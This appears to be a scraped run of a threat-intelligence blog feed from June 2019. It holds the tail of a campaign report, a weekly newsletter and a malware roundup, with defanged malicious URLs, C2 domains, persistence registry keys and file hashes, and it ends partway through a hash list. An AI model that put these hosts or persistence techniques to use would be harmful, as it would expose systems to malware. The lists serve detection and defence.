The actors' preference for open-source solutions appears to be part of a broader trend in which adversaries are increasingly using publicly available tools, which offer them some advantages over a completely custom toolset. A campaign that leverages custom tools is more easily attributed to the tools' developers. One example of this was the code overlap in the VPNFilter malware that allowed us to associate the activity with the Blackenergy malware. By contrast, operations performed with open-source frameworks are extremely difficult to attribute without additional insights or intelligence. Over the past several years, there have been multiple instances of advanced threat actors using open-source techniques, such as MuddyWater,among others. This growing trend highlights that highly trained operators are increasingly using unsophisticated tools to accomplish their goals.

Coverage

Ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.

Cisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Additional protections with context to your specific environment and threat data are available from the Firepower Management Center.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Indicators of Compromise

Hashes
418379fbfe7e26117a36154b1a44711928f52e33830c6a8e740b66bcbe63ec61
50195be1de27eac67dd3e5918e1fc80acaa16159cb48b4a6ab9451247b81b649
6b2c71bfc5d2e85140b87c801d82155cd9abd97f84c094570373a9620e81cee0
6be18e3afeec482c79c9dea119d11d9c1598f59a260156ee54f12c4d914aed8f
6e6e7ac84b1b0a0ae833ef2cb56592e1a7efc00ffad9b06bce7e676befc84185
b2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93

URLs
hxxp://droobox[.]online/luncher.doc
hxxp://msdn[.]cloud/FC001/JOHN
hxxp://search-bing[.]site/FC003/User=H6szn1woY2pLV

Domains
msdn[.]cloud
search-bing[.]site
droobox[.]online

↧

Threat Source newsletter (June 6)

June 6, 2019, 11:00 am

≫ Next: Threat Roundup for May 31 to June 7

≪ Previous: It's alive: Threat actors cobble together open-source pieces into monstrous Frankenstein campaign

Newsletter compiled by Jonathan Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

We hope to see everyone this weekend at the Talos Threat Research Summit in San Diego (or throughout the week at Cisco Live). If you’re around, stop by the Talos booth on the Cisco Live floor — who knows, we may have some swag to give out! For those of you who are attending, brush up on the schedule here.

There’s been a lot of talk about a bug in Microsoft RDP that could leave systems open to a “wormable” attack. When Microsoft disclosed the vulnerability last month, there was little guidance on how to defend against an exploit. Now, we have a new method using Cisco Firepower to block any encrypted attacks attempting to use this vulnerability. This means that you’ll be able to protect against attacks that would otherwise go undetected.

This week, we also unveiled our research on Frankenstein, a new campaign that cobbles together several open-source techniques to infect users. While it’s been used with relatively low volume so far, because of its nature, the attackers behind it have the ability to change it on the fly and evolve over time.

Finally, we also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.

Upcoming public engagements with Talos

Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
Location: Metro Toronto Convention Center, Toronto, Canada
Date: Oct. 7 - 10
Speaker: Edmund Brumaghin and Earl Carter
Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

Cyber Security Week in Review

Security researchers say the EternalBlue exploit was not used in a ransomware attack on the city of Baltimore. Local and state officials in Maryland had demanded answers from the National Security Administration, where the exploit was originally developed.
Apple unveiled a new sign-on mechanism that will allow users to log in to certain sites using their Apple ID. The company says it will make it more difficult for third-party apps to track and store users’ information.
Chinese tech company Huawei reached an agreement with Russia to build out the country’s 5G network. Huawei has been locked in a battle with the U.S. recently after the U.S. banned the company’s products.
The U.S. State Department sent a plan to Congress to establish a new $20.8 million cybersecurity department. The new Bureau of Cyberspace Security and Emerging Technologies (CSET) would “lead U.S. government diplomatic efforts to secure cyberspace and its technologies, reduce the likelihood of cyber conflict, and prevail in strategic cyber competition.”
A major university in Australia says hackers stole 19 years’ worth of personal information on its students and faculty. Officials with Australian National University say the attack impacted about 200,000 people, including their credit card numbers, names, addresses, dates of birth and more.
A zero-day vulnerability in Mac Mojave could allow an attacker to bypass security measures and run malicious code. The bug allows malicious users to mimic mouse clicks, bypass security measures, and then run whitelisted apps that have been manipulated to run malicious code.
Medical testing company LabCorp. says millions of customers had their information leaked as part of a cyberattack at a third-party firm. The company said the American Medical Collection Agency had their information stolen at various times between August 2018 and March 2019.
Cisco patched two high-severity vulnerabilities in its Industrial Network Director. The bugs could allow an attacker to gain the ability to execute code remotely, or cause a denial-of-service condition.
The attackers behind the GandCrab ransomware say they are retiring after earning millions of dollars from the attack. The group claims on a forum post they made $2 billion during the malware’s lifecycle.

Notable recent security issues

Title:Attackers exploit bug in popular WordPress vulnerability to inject malicious JavaScript
Description: Attackers are exploiting a recently patched bug in a WordPress plugin that allows them to redirect users to malicious sites. The vulnerability exists in the content management system’s instant chat plugin, which can allow site managers to communicate directly with users. The bug allows attackers to inject malicious JavaScript into these sites, sending them to attacker-controlled websites or displaying malicious pop-ups.
Snort SIDs: 50299

Title: Cisco Firepower protects against encrypted attacks exploiting Microsoft RDP bug
Description: Researchers at Cisco Talos discovered a new way to protect against encrypted attacks exploiting a recently disclosed vulnerability in Microsoft RDP. Microsoft disclosed the bug in May, but did not provide any guidance on how to mitigate attacks. A new method using Cisco Firepower Management Center allows users to protect themselves from attacks that would otherwise go virtually undetected.
Snort SIDs: 50137

Most prevalent malware files this week

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 47b97de62ae8b2b927542aa5d7f3c858
Typical Filename: qmreportupload.exe
Claimed Product: qmreportupload
Detection Name: Win.Trojan.Generic::in10.talos

SHA 256: 144e4b5a6e99d9e89dae2ac2907c313d253878e13db86c6f5c50dae6e17a015a
MD5: 5e3b592b8e093f92ae9f6cfc93b22c58
Typical Filename: pupdate.exe
Claimed Product: Internet Explorer
Detection Name: W32.144E4B5A6E-95.SBX.TG

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: wup.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

↧

Threat Roundup for May 31 to June 7

June 7, 2019, 12:00 pm

≫ Next: Know before you go: Talos Threat Research Summit

≪ Previous: Threat Source newsletter (June 6)

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between May 31 and June 07. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.

The most prevalent threats highlighted in this roundup are:

Win.Malware.Cerber-6984447-1
Malware
Cerber is ransomware that encrypts documents, photos, databases and other important files using the file extension ".cerber."
Win.Malware.Ircbot-6984710-0
Malware
Ircbot, also known as Eldorado, is known for injecting into processes, spreading to removable media, and gaining execution via Autorun.inf files.
Win.Malware.Kovter-6985541-0
Malware
Kovter is known for its fileless persistence mechanism. This family of malware creates several malicious registry entries which store its malicious code. Kovter is capable of reinfecting a system, even if the file system has been cleaned of the infection. Kovter has been used in the past to spread ransomware and click-fraud malware.
Win.Malware.Lokibot-6987581-1
Malware
Lokibot is an information-stealing malware designed to siphon off sensitive information stored on an infected device. It is modular in nature, supporting the ability to steal sensitive information from a number of popular applications. It is commonly pushed via malicious documents delivered via spam emails.
Win.Malware.Remcos-6985941-1
Malware
Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. Remcos is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Malware.Tofsee-6988429-1
Malware
Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.
Win.Packed.Zbot-6986485-1
Packed
Zbot, also known as Zeus, is trojan that steals information such as banking credentials using methods such as key-logging and form grabbing.
Win.Ransomware.Sage-6987538-1
Ransomware
The Sage ransomware encrypts files and then demands a payment for the files to be recovered. Sage typically spreads via malicious email attachments, and the encrypted file extensions vary.
Win.Worm.Vobfus-6986418-0
Worm
Vobfus is a worm that copies itself to external drives and attempts to gain automatic code execution via autorun.inf files. It also modifies the registry so that it will launch when the system is booted. Once installed, it attempts to download follow-on malware from its command and control (C2) servers.

Threats

Win.Malware.Cerber-6984447-1

Indicators of Compromise

Registry Keys	Occurrences
`<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer`	21
`<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\16000009`	19
`<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\16000009 Value Name: Element`	19
`<HKCU>\Printers\Defaults\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D}`	19
`<HKCU>\PRINTERS\Defaults`	19
`<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\250000e0`	19
`<HKLM>\BCD00000000\OBJECTS\{926583E4-EF64-11E4-BEED-D6738078AD98}\ELEMENTS\250000E0 Value Name: Element`	19
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER Value Name: Run`	19
`<HKCU>\SOFTWARE\MICROSOFT\COMMAND PROCESSOR Value Name: AutoRun`	19
`<HKCU>\CONTROL PANEL\DESKTOP Value Name: SCRNSAVE.EXE`	19
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: MuiUnattend`	2
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: MuiUnattend`	2
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: takeown`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: EhStorAuthn`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: EhStorAuthn`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: ntoskrnl`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: ntoskrnl`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: UserAccountControlSettings`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: UserAccountControlSettings`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: pcaui`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: pcaui`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: w32tm`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: w32tm`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: eventvwr`	1
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNONCE Value Name: eventvwr`	1

Mutexes	Occurrences
`shell.{381828AA-8B28-3374-1B67-35680555C5EF}`	19
`\BaseNamedObjects\shell.{5B5347A7-9806-3802-3FD9-E106D6283088}`	2
`\BaseNamedObjects\shell.{2DA495A3-711D-597E-268E-77F8D29EB324}`	1
`\BaseNamedObjects\shell.{A90EDFAB-A502-430E-BDBC-2A277AABA37D}`	1
`\BaseNamedObjects\shell.{5B932A48-D5E6-DC9D-1CCC-8C4A4EFDFAEB}`	1
`\BaseNamedObjects\shell.{641070EF-FED1-8B40-20B1-757459DEA0E7}`	1
`\BaseNamedObjects\shell.{85890FA8-4651-7F6B-96B4-C1A19F5B4623}`	1
`\BaseNamedObjects\shell.{1095E0BC-41F3-CF2A-1232-3CB5F90C4677}`	1
`\BaseNamedObjects\shell.{F1DB17FA-39DB-DA6E-6E05-AC596D3CADD5}`	1
`\BaseNamedObjects\shell.{298948D1-70B9-FF20-23B0-FFCF5A6170CF}`	1
`\BaseNamedObjects\shell.{6B756908-BAD6-5676-BEB4-1AF11E0335F1}`	1
`\BaseNamedObjects\shell.{31C26804-8082-BCD2-AE9A-2E0E343C4A11}`	1

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`85[.]93[.]0[.]38`	19
`85[.]93[.]0[.]39`	19
`85[.]93[.]0[.]36`	19
`85[.]93[.]0[.]37`	19
`85[.]93[.]0[.]34`	19
`85[.]93[.]7[.]234`	19
`85[.]93[.]0[.]32`	19
`85[.]93[.]0[.]33`	19
`85[.]93[.]6[.]24`	19
`85[.]93[.]6[.]25`	19
`85[.]93[.]5[.]10`	19
`85[.]93[.]5[.]11`	19
`85[.]93[.]6[.]244`	19
`85[.]93[.]6[.]16`	19
`85[.]93[.]6[.]17`	19
`85[.]93[.]6[.]18`	19
`85[.]93[.]6[.]19`	19
`85[.]93[.]6[.]20`	19
`85[.]93[.]6[.]21`	19
`85[.]93[.]6[.]22`	19
`85[.]93[.]6[.]23`	19
`85[.]93[.]6[.]169`	19
`85[.]93[.]5[.]72`	19
`85[.]93[.]3[.]20`	19
`85[.]93[.]2[.]71`	19
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`ipinfo[.]io`	19

Files and or directories created	Occurrences
`%HOMEPATH%\NTUSER.DAT`	19
`%HOMEPATH%\ntuser.dat.LOG1`	19
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}`	19
`%System32%\Tasks\MuiUnattend`	2
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\MuiUnattend.lnk`	2
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\MuiUnattend.exe`	2
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\UserAccountControlSettings.exe`	1
`%System32%\Tasks\UserAccountControlSettings`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\pcaui.lnk`	1
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\pcaui.exe`	1
`%System32%\Tasks\pcaui`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\w32tm.lnk`	1
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\w32tm.exe`	1
`%System32%\Tasks\w32tm`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\eventvwr.lnk`	1
`%System32%\Tasks\eventvwr`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\wuapp.lnk`	1
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\wuapp.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\bitsadmin.lnk`	1
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\bitsadmin.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\certreq.lnk`	1
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\certreq.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\mtstocom.lnk`	1
`%APPDATA%\{6F885251-E36F-0FE6-9629-63208157D7A2}\mtstocom.exe`	1
`%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\autochk.lnk`	1
See JSON for more IOCs

File Hashes

12c882e47ae5e2ef9e3621b1d8a719458041ce6f1ed38b370c45c821a5e8c59b
12ec0e3ccef67f877fefce823785ac7d7dbb0f85f8ad001bdf7fc6bfe46e3981
18ca84623943190fa4ac1f756742b2ae30666d74acc7deee679b3a91bbd75e6f
20b9ff24148baa96dbe1a0a7a48bbbeada81598988ee10605ebb21b139359e09
24e2f47a00dba0b61b7ef2994f56318cc775c6fab40ad232598cebf0410b3da8
30731c843ed73bf36620d943ddce0a0237d8694b7afb212541e2e91416096b2b
33b70cc445e8fa02e56ea688be53f7c2993826388539adf7bf48fef3c45995a7
341e0f811782bc5c95e195f6f4d88de2aece469919de8c2c7b61794f99f40d82
4c3c95c99f5d583e2bbf8fb237e55aee3595dcdf24096dc0336190a067487e15
4f5e962ece139e2478863ad05e2d92ed0f8d37c98616faa2338adb84efe99744
5b54c5a4b56149231c5b2c0b9f0f40e226a4a198c9081068d245320f502fb439
6179ede1ad0a80f932189cf1035fe8fe2329b4bde4ccdfcc1d3cbec15179d2b7
692772293eb858cc1aa0bc9844448d3330a057992453e6a75e0a20e528ee4c6b
734e3caad97e6edc7e62687d5a8a4628348ee24726938204779f3f5eb7a0f400
80616c2ddd1a8c4e8be8c6053a905c9687e1f83336cc5661dca04c5ffb056afe
825848fa43ac2ea280104225d930c7c85f33700c51528113295e75c8dc160aec
9721c8e97b3ba15a00de9ab4dbcc0d3236253b5bb73f2b3e9d4f57c7ed3dd922
c381125d95a755659683f75fbf32b57546d7ef099e266ca1c00a305a1938736f
d9cf96f1f2dd702e618982028129009100e88e30c325775f98e77df4bf907af1
dc7f0f8206c6b155e04cca65f269b7f2a2238297e9782c4605ecd5cf5eb5d8a7
f378761bf7237c3355845ae18cc335b384e4ea7ba5f8ec1deea3fc59e3880050
fa754655007b7b726ede666f2838940ea89d3349dd9c1278a8c998e2eecda3e3
ff4ab281a403144dcd8fcf788e5421e739276389fcfe5cf31c708257d0474799

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Ircbot-6984710-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start`	43
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Microsoft Windows Manager`	43
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: Microsoft Windows Manager`	43

Mutexes	Occurrences
`b2`	43
`\BaseNamedObjects\b2`	3

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`220[.]181[.]87[.]80`	43
`64[.]70[.]19[.]203`	43
`216[.]160[.]207[.]10`	43
`35[.]231[.]151[.]7`	26
`35[.]229[.]93[.]46`	17
`69[.]49[.]96[.]16`	2
`216[.]218[.]206[.]69`	1

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`ageihehaioeoaiegj[.]su`	43
`aefobfboabobfaoua[.]ru`	43
`oeihefoeaboeubfuo[.]su`	43
`eghoabeogbuaeofua[.]su`	43
`abvainvienvaiebai[.]ru`	43
`eghoabeogbuaeofua[.]ru`	43
`iapghahpnpnapcipa[.]ru`	43
`oeihefoeaboeubfuo[.]ws`	43
`goiaegodbuebieibg[.]ru`	43
`iapghahpnpnapcipa[.]ws`	43
`ageihehaioeoaiegj[.]ru`	43
`siiifibiiegiiciib[.]su`	43
`oeihefoeaboeubfuo[.]ru`	43
`aefobfboabobfaoua[.]su`	43
`abvainvienvaiebai[.]su`	43
`rohgoruhgsorhugih[.]ru`	43
`rohgoruhgsorhugih[.]su`	43
`siiifibiiegiiciib[.]ru`	43
`oeabocbeogoaehgoi[.]ru`	43
`rohgoruhgsorhugih[.]ws`	43
`oeabocbeogoaehgoi[.]su`	43
`iapghahpnpnapcipa[.]su`	43
`goiaegodbuebieibg[.]su`	43
`murphysisters[.]org[.]murphysisters[.]org`	2
`www[.]murphysisters[.]org`	2

Files and or directories created	Occurrences
`\??\E:\autorun.inf`	43
`\autorun.inf`	43
`\??\E:\_`	43
`\.lnk`	43
`\??\E:\DeviceConfigManager.vbs`	43
`\??\E:\_\DeviceConfigManager.exe`	43
`\DeviceConfigManager.vbs`	43
`\_\DeviceConfigManager.exe`	43
`\??\E:\DeviceConfigManager.bat`	43
`\DeviceConfigManager.bat`	43
`%SystemRoot%\M-5050720597279729037972350920`	43
`%SystemRoot%\M-5050720597279729037972350920\winmgr.exe`	43
`\??\E:\.lnk`	41
`%TEMP%\phqghumeay`	30
`%TEMP%\edakubnfgu`	29
`%TEMP%\rgjqmvnkyr`	26
`%TEMP%\gwhroqkhwu`	25
`%TEMP%\tubjrnmzyu.bat`	2
`%TEMP%\eakjohgdtz.bat`	1
`%TEMP%\roomnvjngg.bat`	1
`%TEMP%\ynyfoqgvhz.bat`	1
`%TEMP%\sypfjdusmt.bat`	1
`%TEMP%\inwumejvuz.bat`	1
`%TEMP%\euywrsbhrm.bat`	1
`%TEMP%\jorljhwyxb.bat`	1
See JSON for more IOCs

File Hashes

02fb71eb8559f95fd9d1bc2a31b119306c15a0921ab79101bc35e5ee1729e873
0373f392e0cf0ec8a14fdf48a157cbbca1554960b0475724f45a80aae88932f3
0851ddc919f0ea470c3c23e296b6a76b378678364d63a119f6ebab2779e75c00
0b30c46cb7774dfa26d40809d4a665ba733364f3e9768314f5ac258c1ca2b213
0e455cc4d487203ed86f96707ddcf09546c523b14238b003959d29db80db022a
1538cc3c6f059ee7b734150f5e8eab97739c226119edd8b07c543ac77fc68ca5
15647f00761bb8ff63128c4af1e1277e69b4f51c627779259833c6e2d474aea0
168070acbb2cb5200981e8d0dbed8255bb389feef078162f1ba140dc3ea33553
16eae34bfa90161d7948d421636687c4b2e7cd4bf66d33dc27da05370f1f1cdd
1b0cff388754655704d76af041b56978edd261dd7c2bb8a64a7a79a808312e00
1db1f2b0cf7c31206624f21c76587f97e41797d4b034e60577167c751a41c9d7
1f9c1401a3d5279386e59811bd6a916fd555d0ce2701f955110cf548219f64f8
1ffc4c395bbb6a3a25b17845a5bf7d897e7c9455c29a7d930607dddb1539f72e
22e62621d215f605a6ad76325c08c8ade8a78a55411fad1e4081e0406069404d
2a9836c84b839afa60b4fec08b0285404b065a596458237bdbadd9937b637ae2
2d2d8936c9f938e60799545e538bc2397f1c2db0d5bf6a8e8afbb7cd561a81f5
2d32b4679e6550adb81a453813e8a820f9d61133d946a32035a4ec3ab566e421
2d5beaf3e2779270c8b6c3c9d288a64f53e4065104d6806438178f1283ed1c21
2da6a2799761b83b1206e7dab4d590dfb689af837cf3ac66fa3e58bb8484ee21
343054da58235802ed6126128c9b5d1017e32f0831ed5bc09748c0c3707d5433
3451ccb4bdf160e6150d3f1f4ed55dc943544780edcef3098283e41502c8b4ab
368ff13ab0807019f61b3ab0ee083c2ab701151582fd59e3b055be3f4e2c63ed
36dc719c3e47172a121189c734406055df92e986d1e202769a2432191f028bf1
386fdf3836ad5b3bf1588e6b40700abdc69eb793cfe7c6f36895da751944d2bb
3a6e2efe8331037681da5ee01f8deb8aa7cd9960b21f5975aef7d876f7e82b86
See JSON for more IOCs

Coverage

Screenshots of Detection

AMP

ThreatGrid

Win.Malware.Kovter-6985541-0

Indicators of Compromise

Registry Keys	Occurrences
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE Value Name: DisableOSUpgrade`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUPGRADE Value Name: ReservationsAllowed`	25
`<HKLM>\SOFTWARE\WOW6432NODE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run`	25
`<HKCU>\SOFTWARE\fc6a75be78`	25
`<HKLM>\SOFTWARE\WOW6432NODE\fc6a75be78`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WindowsUpdate`	25
`<HKLM>\SOFTWARE\POLICIES\MICROSOFT\WINDOWS\WINDOWSUPDATE\OSUpgrade`	25
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 Value Name: 0521341d`	25
`<HKCU>\SOFTWARE\FC6A75BE78 Value Name: 0521341d`	25
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 Value Name: b5e001e3`	25
`<HKCU>\SOFTWARE\FC6A75BE78 Value Name: b5e001e3`	25
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 Value Name: bca7705c`	25
`<HKCU>\SOFTWARE\FC6A75BE78 Value Name: bca7705c`	25
`<HKLM>\SOFTWARE\WOW6432NODE\FC6A75BE78 Value Name: 0905afc0`	23
`<HKCU>\SOFTWARE\FC6A75BE78 Value Name: 0905afc0`	23
`<HKLM>\SOFTWARE\WOW6432NODE\E75950E48E5A494D2B`	1
`<HKLM>\SOFTWARE\WOW6432NODE\0oCEoq`	1
`<HKLM>\SOFTWARE\WOW6432NODE\98LFDHTIH Value Name: FeWPlOewHO`	1
`<HKLM>\SOFTWARE\WOW6432NODE\E75950E48E5A494D2B Value Name: 7CAC0591BC7764C7382`	1
`<HKLM>\SOFTWARE\WOW6432NODE\98LFDHTIH Value Name: p6gawa3`	1
`<HKCR>\RATHF\SHELL\OPEN\COMMAND`	1
`<HKCR>\.XJJWQ8S`	1
`<HKLM>\SOFTWARE\WOW6432NODE\0OCEOQ Value Name: YcaGv7s`	1
`<HKLM>\SOFTWARE\WOW6432NODE\0OCEOQ Value Name: gG1npQtvrW`	1
`<HKLM>\SOFTWARE\WOW6432NODE\5C8B173AEDDAD6407C3D`	1

Mutexes	Occurrences
`C59C87A31F74FB56`	25
`Global\42EDC1955FE17AD4`	25
`0D0D9BEBF5D08E7A`	25
`1315B41013857E19`	25
`\BaseNamedObjects\BAD24FA07A7F6DD9`	24
`\BaseNamedObjects\863D9F083B3F4EDA`	24
`\BaseNamedObjects\Global\EE662FBC96CBCB1A`	24

IP Addresses contacted by malware. Does not indicate maliciousness	Occurrences
`99[.]19[.]28[.]150`	1
`33[.]162[.]102[.]125`	1
`152[.]71[.]205[.]88`	1
`25[.]4[.]98[.]57`	1
`180[.]222[.]21[.]248`	1
`125[.]197[.]146[.]126`	1
`1[.]75[.]211[.]46`	1
`164[.]202[.]251[.]11`	1
`149[.]126[.]117[.]212`	1
`6[.]104[.]211[.]114`	1
`169[.]78[.]132[.]23`	1
`46[.]130[.]20[.]79`	1
`187[.]185[.]88[.]9`	1
`217[.]134[.]228[.]74`	1
`156[.]244[.]226[.]39`	1
`70[.]181[.]27[.]114`	1
`142[.]72[.]113[.]250`	1
`187[.]78[.]253[.]202`	1
`46[.]171[.]247[.]91`	1
`146[.]148[.]18[.]137`	1
`51[.]145[.]9[.]51`	1
`190[.]43[.]97[.]88`	1
`152[.]195[.]236[.]164`	1
`191[.]169[.]221[.]13`	1
`213[.]55[.]97[.]176`	1
See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness	Occurrences
`cpanel[.]com`	1
`etp[.]adilet[.]gov[.]kz`	1

Files and or directories created	Occurrences
`%LOCALAPPDATA%\epobuj`	1
`%LOCALAPPDATA%\epobuj\0qIkSdDC.V0Eq5OI`	1
`%LOCALAPPDATA%\lyza`	1
`%LOCALAPPDATA%\lyza\CdxtVr.frbnvz`	1
`%LOCALAPPDATA%\zamem`	1
`%LOCALAPPDATA%\zamem\tOLe1R7o.SeYQX`	1
`%LOCALAPPDATA%\jyde`	1
`%LOCALAPPDATA%\jyde\OAws9tY.gXnWQL7wx`	1
`%LOCALAPPDATA%\umove`	1
`%LOCALAPPDATA%\umove\tX0S.dyCX7y`	1
`%LOCALAPPDATA%\ojoc`	1
`%LOCALAPPDATA%\ojoc\zurK74.xJjWq8s`	1
`%LOCALAPPDATA%\pyrul`	1
`%LOCALAPPDATA%\pyrul\Mo3j.DWTa0cV`	1
`%LOCALAPPDATA%\bebet`	1
`%LOCALAPPDATA%\bebet\iIKL9U.DGsvEB`	1

File Hashes

00bd28d59cb4b7018516410c9664eec2eefe7adba447a37edb587d4829eb760d
037385b8865ee894bf36cdce3b370265b7da03447b3b4e18dd72d114330e9942
039c52e2bd728ba1ac902a0f4af7363d28aced0ba6f5622fbd0e118d959f59b2
065d2473aa32a471228eba99fd58773ee61a634e4f2466b69f6f9c2c94ae56d3
08e337c9f049aa7529aa727fcb8898d1eb2bf14d4b656af95d740e07d7ef9b67
